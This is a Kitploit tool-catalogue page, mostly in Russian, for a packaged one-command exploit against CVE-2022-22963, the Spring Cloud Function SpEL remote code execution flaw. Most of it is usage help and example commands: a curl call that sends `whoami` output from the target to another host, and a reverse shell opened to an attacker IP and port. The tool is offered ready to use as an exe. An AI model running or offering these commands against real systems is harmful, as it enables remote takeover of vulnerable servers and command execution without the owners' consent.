Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22963 — spring cloud function 一键利用工具! by charis 博客https://charis3306.top/ | Kitploit
Инструменты/GitHubGitHub/charis3306/cve-2022-22963
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubcharis3306/cve-2022-22963

CVE-2022-22963

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

Репозиторий
833 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-22963 (spring cloud function sple rce)

spring cloud function инструмент для эксплуатации одной командой! от charis

Блог https://charis3306.top/

Упакован в exe-файл, готов к использованию «из коробки»

Тема команд

usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

--check обязателен

Тема справки

Spring-cloud-function-spel0.2.exe --help

image

По умолчанию --check обязателен, --route — маршрут, по которому существует уязвимость. Обратите внимание: если не использовать dnslog или sleep для проверки, возможны ложные срабатывания!

Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

Выполнение команды для проверки возможности эксплуатации
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

Реверс-шелл
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

Если вам понравилось, поставьте звезду

Обратная связь: Issues или эл. почта [email protected]

Скачать инструмент